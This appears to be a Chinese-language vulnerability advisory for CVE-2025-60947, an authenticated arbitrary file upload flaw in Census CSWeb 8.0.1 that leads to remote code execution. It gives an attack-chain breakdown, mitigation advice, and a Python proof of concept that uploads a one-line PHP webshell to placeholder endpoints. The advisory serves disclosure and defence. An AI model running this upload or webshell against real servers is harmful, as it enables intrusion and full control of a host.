CVE-2025-60947 CVSS 8.8 高危

CVE-2025-60947 Census CSWeb 任意文件上传漏洞

披露日期: 2026-03-23

来源: 9119a7d8-5eab-497f-8521-727c672e3725

漏洞信息

漏洞编号

CVE-2025-60947

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Census CSWeb

漏洞概述

Census CSWeb 8.0.1版本存在任意文件上传漏洞。由于系统未对用户上传的文件类型进行严格的安全校验，经过身份认证的远程攻击者可利用此漏洞上传恶意文件（如Webshell）。攻击者成功上传后，可能进一步触发远程代码执行，从而完全控制受影响的服务器，造成数据泄露或系统破坏。目前该问题已在8.1.0 alpha版本中修复。

技术细节

该漏洞的核心在于Census CSWeb应用程序在文件上传模块中缺乏有效的过滤机制。攻击者首先需要通过合法账户登录系统（满足PR:L低权限要求）。随后，攻击者构造包含恶意脚本的HTTP POST请求发送至上传接口。由于服务端未对文件扩展名、Content-Type或文件内容进行严格的白名单验证，恶意文件被成功保存至Web目录下。最后，攻击者通过浏览器直接访问该恶意文件的URL，迫使服务器解析并执行其中的代码，从而获得系统的Shell权限，实现远程代码执行（RCE）。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标为Census CSWeb系统，并确定版本在8.0.1或更低。

STEP 2

Initial Access

攻击者使用获取的低权限账户凭证登录系统，绕过未认证的防御。

STEP 3

Exploitation

攻击者利用文件上传功能，发送特制的数据包，绕过文件类型检查，上传包含恶意代码的脚本文件。

STEP 4

Execution

攻击者发送HTTP请求访问已上传的文件路径，触发服务器端解析执行恶意代码。

STEP 5

Impact

成功获取服务器权限，执行任意系统命令，完全控制主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60947 PoC: Arbitrary File Upload leading to RCE
# Target: Census CSWeb 8.0.1

target_url = "http://target-csweb-url/upload_endpoint"
login_url = "http://target-csweb-url/login"

# Attacker credentials
username = "low_priv_user"
password = "password"

# Malicious file content (e.g., PHP webshell)
shell_content = "<?php system($_GET['cmd']); ?>"

session = requests.Session()

# 1. Authenticate
login_data = {"username": username, "password": password}
session.post(login_url, data=login_data)

# 2. Upload malicious file
files = {"file": ("shell.php", shell_content, "application/x-php")}
response = session.post(target_url, files=files)

if response.status_code == 200 and "upload" in response.text.lower():
    print("[+] File uploaded successfully!")
    print(f"[+] Check shell at: {target_url.replace('upload_endpoint', 'uploads/shell.php')}")
else:
    print("[-] Upload failed")

影响范围

Census CSWeb 8.0.1

Census CSWeb < 8.1.0 alpha

防御指南

临时缓解措施

若无法立即升级，建议通过配置Web服务器（如Nginx或Apache）禁止在上传目录执行PHP、JSP等脚本文件。同时，部署Web应用防火墙（WAF）以拦截针对上传接口的异常请求，并密切监控系统日志中的异常文件创建行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表